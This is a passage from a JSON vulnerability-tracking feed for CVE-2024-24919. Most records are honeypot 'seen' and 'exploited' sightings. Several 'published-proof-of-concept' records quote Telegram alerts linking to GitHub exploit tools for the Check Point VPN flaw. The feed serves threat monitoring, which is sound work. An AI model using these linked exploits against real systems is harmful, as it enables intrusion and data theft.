"b04e967c-a172-43df-9710-d8d0f6409524", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-12-12)", "content": "", "creation_timestamp": "2025-12-12T00:00:00.000000Z"}, {"uuid": "af92cb75-7e2a-46c7-b7f0-d6acc7497086", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-05)", "content": "", "creation_timestamp": "2026-02-05T00:00:00.000000Z"}, {"uuid": "6e2f426e-35f8-4753-9449-786029bd8c6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-15)", "content": "", "creation_timestamp": "2025-12-15T00:00:00.000000Z"}, {"uuid": "418b37db-7a75-4e6d-a71c-966e64f04e01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-12-25)", "content": "", "creation_timestamp": "2025-12-25T00:00:00.000000Z"}, {"uuid": "0356f344-f7b9-441f-97b4-28ca09fd8829", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-06)", "content": "", "creation_timestamp": "2026-02-06T00:00:00.000000Z"}, {"uuid": "6213a330-f43e-4af2-a319-71f3d8787855", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-12-23)", "content": "", "creation_timestamp": "2025-12-23T00:00:00.000000Z"}, {"uuid": "ebb4db7a-235b-4eea-93b1-6fce6abfb3d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-25)", "content": "", "creation_timestamp": "2025-12-25T00:00:00.000000Z"}, {"uuid": "a3a56a9d-f858-445c-88e7-23fbc38b2012", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-12-30)", "content": "", "creation_timestamp": "2025-12-30T00:00:00.000000Z"}, {"uuid": "bc9bd76f-9c1a-47a6-b5b5-089b77c2d287", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-26)", "content": "", "creation_timestamp": "2026-02-26T00:00:00.000000Z"}, {"uuid": "42177b3f-a038-4497-9e11-fd34f9d6da09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-30)", "content": "", "creation_timestamp": "2026-01-30T00:00:00.000000Z"}, {"uuid": "33a00b6e-d610-4e8b-92c2-683ea6e97b1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-30)", "content": "", "creation_timestamp": "2025-12-30T00:00:00.000000Z"}, {"uuid": "dbaac857-bdeb-4058-bf44-4ddb1adf4f17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-12-29)", "content": "", "creation_timestamp": "2025-12-29T00:00:00.000000Z"}, {"uuid": "c9f76b92-d09d-4efa-96d6-6c99070eb0e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-02-13)", "content": "", "creation_timestamp": "2026-02-13T00:00:00.000000Z"}, {"uuid": "2e293415-0d45-4d80-99a5-1437c6a85727", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-06)", "content": "", "creation_timestamp": "2026-03-06T00:00:00.000000Z"}, {"uuid": "8ce9e2d9-6f7d-4b02-ace9-d7a38eaa8055", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-31)", "content": "", "creation_timestamp": "2025-12-31T00:00:00.000000Z"}, {"uuid": "7fc79675-2655-4072-a2cd-3095d85e7603", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-05)", "content": "", "creation_timestamp": "2026-01-05T00:00:00.000000Z"}, {"uuid": "d9d5450b-ad86-4524-a8d9-5b41e87e0d3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-05)", "content": "", "creation_timestamp": "2026-01-05T00:00:00.000000Z"}, {"uuid": "2dcfcadc-1b4f-4ebb-bcff-993ae5d90fb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-04)", "content": "", "creation_timestamp": "2026-01-04T00:00:00.000000Z"}, {"uuid": "b0632e29-c94a-43f3-9390-d9743aad28b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-04)", "content": "", "creation_timestamp": "2026-01-04T00:00:00.000000Z"}, {"uuid": "826fb431-194f-4c26-b162-9a9e99b0b5ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-05)", "content": "", "creation_timestamp": "2026-03-05T00:00:00.000000Z"}, {"uuid": "f96d5cc8-7da1-471d-b1b3-4bb4c914a75c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-20)", "content": "", "creation_timestamp": "2026-02-20T00:00:00.000000Z"}, {"uuid": "1b6a7cd9-b2c0-4eae-b527-4f570d74d4da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-08)", "content": "", "creation_timestamp": "2026-01-08T00:00:00.000000Z"}, {"uuid": "0fa01b4c-e2a5-4c52-8c4c-b9fb528d488f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-19)", "content": "", "creation_timestamp": "2026-02-19T00:00:00.000000Z"}, {"uuid": "f410c5b4-b6de-474d-a2ab-272e7f8637df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-06)", "content": "", "creation_timestamp": "2026-01-06T00:00:00.000000Z"}, {"uuid": "e0d6af17-d18a-4487-adb2-1c72a8c3ec0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-08)", "content": "", "creation_timestamp": "2026-01-08T00:00:00.000000Z"}, {"uuid": "63fed1e4-c6f7-41e0-bf3b-757bc3dc9638", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-18)", "content": "", "creation_timestamp": "2026-03-18T00:00:00.000000Z"}, {"uuid": "472715fb-27fb-4102-a922-0dcd5f515759", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-09)", "content": "", "creation_timestamp": "2026-01-09T00:00:00.000000Z"}, {"uuid": "5a5a2812-3943-48e7-8f9b-c5a7f3436620", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-19)", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "9eee0cb9-f257-4da5-9e7c-d23a6af15ce7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-29)", "content": "", "creation_timestamp": "2026-03-29T00:00:00.000000Z"}, {"uuid": "c7694f47-a7f4-4149-8026-eaf6f48658e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-25)", "content": "", "creation_timestamp": "2026-03-25T00:00:00.000000Z"}, {"uuid": "f6a25661-1994-4dc7-9c26-44e049de718a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-09)", "content": "", "creation_timestamp": "2026-01-09T00:00:00.000000Z"}, {"uuid": "36e18fc9-2bf1-4839-b8bb-4b093906eb43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-28)", "content": "", "creation_timestamp": "2026-03-28T00:00:00.000000Z"}, {"uuid": "a89c6bcd-af48-457b-af27-488fb5d9cda7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-10)", "content": "", "creation_timestamp": "2026-01-10T00:00:00.000000Z"}, {"uuid": "4a20569f-b4b4-4108-a340-09c9a46d1a6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-26)", "content": "", "creation_timestamp": "2026-03-26T00:00:00.000000Z"}, {"uuid": "207ecbc7-5db0-4773-bc11-3656fcc7b63f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-12)", "content": "", "creation_timestamp": "2026-01-12T00:00:00.000000Z"}, {"uuid": "52700901-2d7c-4b94-b4a2-7da8dd8a21b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-11)", "content": "", "creation_timestamp": "2026-01-11T00:00:00.000000Z"}, {"uuid": "ebf7516f-8dfa-4964-a9d7-7f8d9db08fb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-13)", "content": "", "creation_timestamp": "2026-01-13T00:00:00.000000Z"}, {"uuid": "df1beae4-94be-4024-84aa-ca196a24ef2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-27)", "content": "", "creation_timestamp": "2026-03-27T00:00:00.000000Z"}, {"uuid": "16220171-814c-4de3-8203-547aa1f0abc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-15)", "content": "", "creation_timestamp": "2026-01-15T00:00:00.000000Z"}, {"uuid": "ac1ca7af-ad3e-4ee3-930d-65b6a5532902", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-15)", "content": "", "creation_timestamp": "2026-01-15T00:00:00.000000Z"}, {"uuid": "862507d4-9678-4011-9c6c-d2b2e93e394a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-27)", "content": "", "creation_timestamp": "2026-03-27T00:00:00.000000Z"}, {"uuid": "e431835e-fdaa-4466-aa90-02beb6524f4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_15/2024", "content": "", "creation_timestamp": "2024-05-29T13:46:26.000000Z"}, {"uuid": "b74f60c5-0a24-45a8-8003-a74a6a05533f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-17)", "content": "", "creation_timestamp": "2026-01-17T00:00:00.000000Z"}, {"uuid": "1962539e-a803-46ca-974a-7c0aaa8afcc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-18)", "content": "", "creation_timestamp": "2026-01-18T00:00:00.000000Z"}, {"uuid": "eaf3987b-d427-4380-a281-51532b002ad0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-29)", "content": "", "creation_timestamp": "2026-03-29T00:00:00.000000Z"}, {"uuid": "9930260b-bde8-4f07-ab1f-dff97de8db70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-21)", "content": "", "creation_timestamp": "2026-03-21T00:00:00.000000Z"}, {"uuid": "f2ead626-010c-45f3-988e-eec2c9f47ee7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-20)", "content": "", "creation_timestamp": "2026-03-20T00:00:00.000000Z"}, {"uuid": "cfa1b7a0-cfb6-4954-935a-f8b46396fcf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-19)", "content": "", "creation_timestamp": "2026-01-19T00:00:00.000000Z"}, {"uuid": "af5525b1-e9c2-4661-bdaa-2bf6fba5a374", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-20)", "content": "", "creation_timestamp": "2026-03-20T00:00:00.000000Z"}, {"uuid": "edcf1a04-2858-4bbc-aced-a43d125f7923", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-20)", "content": "", "creation_timestamp": "2026-01-20T00:00:00.000000Z"}, {"uuid": "772e954a-1d29-4604-a1b2-c8ec421de310", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-19)", "content": "", "creation_timestamp": "2026-01-19T00:00:00.000000Z"}, {"uuid": "d40c8864-a513-46ab-bfd3-40de2fc508ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-19)", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "fdf4e181-39bc-4a4e-93db-faf9f3cd0d62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-23)", "content": "", "creation_timestamp": "2026-01-23T00:00:00.000000Z"}, {"uuid": "50596e76-3a6a-409c-9696-e0d9e78a79e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-21)", "content": "", "creation_timestamp": "2026-03-21T00:00:00.000000Z"}, {"uuid": "688eb2ab-e42c-480e-9d8e-f47140cf6c29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-20)", "content": "", "creation_timestamp": "2026-01-20T00:00:00.000000Z"}, {"uuid": "cdbe7f9e-97d1-47e3-ae56-ce90fc9bfee3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/fdda4963-0aa7-4d15-8a8f-969db8f304ca", "content": "", "creation_timestamp": "2025-02-28T23:49:13.272798Z"}, {"uuid": "18535307-7b4b-4a1a-90e7-973c79b84af5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/11268897-8798-4ec2-bcac-b23fe0715823", "content": "", "creation_timestamp": "2025-03-11T20:37:58.600981Z"}, {"uuid": "9d3fa33f-39f0-4261-a306-9e5c303fc38b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-22)", "content": "", "creation_timestamp": "2026-01-22T00:00:00.000000Z"}, {"uuid": "b1009dad-5a29-4155-b86a-8a7acba858ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/38c886fd-5d10-4dc0-b60f-65d5d1336dcc", "content": "", "creation_timestamp": "2026-02-02T12:26:36.059037Z"}, {"uuid": "a0a5c17f-d596-4df9-8f14-654af1a5db70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7552", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-24919 exploit that checks more files for better visibility\nURL\uff1ahttps://github.com/nullcult/CVE-2024-24919-Exploit\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-07T12:15:45.000000Z"}, {"uuid": "9aaefb14-2fdf-48a6-b675-1d8886443ff5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-03)", "content": "", "creation_timestamp": "2026-04-03T00:00:00.000000Z"}, {"uuid": "6c33407d-3317-4e77-b485-59caf35973b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-03)", "content": "", "creation_timestamp": "2026-04-03T00:00:00.000000Z"}, {"uuid": "c0e04fb1-8712-41b6-a890-d5f3b75ad95e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7500", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aa Proof of Concept of CVE-2024-24919\nURL\uff1ahttps://github.com/bigb0x/CVE-2024-24919-Sniper\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-02T20:19:20.000000Z"}, {"uuid": "f5747072-a231-41db-8294-a63d77546c36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7479", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-24919 exploit\nURL\uff1ahttps://github.com/GoatSecurity/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-31T13:13:27.000000Z"}, {"uuid": "fa3950fb-7816-4403-9702-6f267e3f05ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7477", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aAn Vulnerability detection and Exploitation tool for CVE-2024-24919\nURL\uff1ahttps://github.com/RevoltSecurities/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-31T10:20:59.000000Z"}, {"uuid": "417675e3-a294-43e1-9fb3-f42b67013b10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7491", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aHerramienta de explotaci\u00f3n para explotar la vulnerabilidad CVE-2024-24919 en las VPN de Checkpoint Firewall\nURL\uff1ahttps://github.com/r4p3c4/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-01T12:05:57.000000Z"}, {"uuid": "c7a6e343-f4b5-49df-bb4f-19a7926bd68f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7542", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aA Simple Exploit Code(POC) to Automate CVE-2024\u201324919\nURL\uff1ahttps://github.com/starlox0/CVE-2024-24919-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-07T02:15:40.000000Z"}, {"uuid": "d7590793-acd3-4770-b86b-662c125b70b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-31)", "content": "", "creation_timestamp": "2026-03-31T00:00:00.000000Z"}, {"uuid": "6859179e-68c9-4c87-9092-6df7fb248bff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 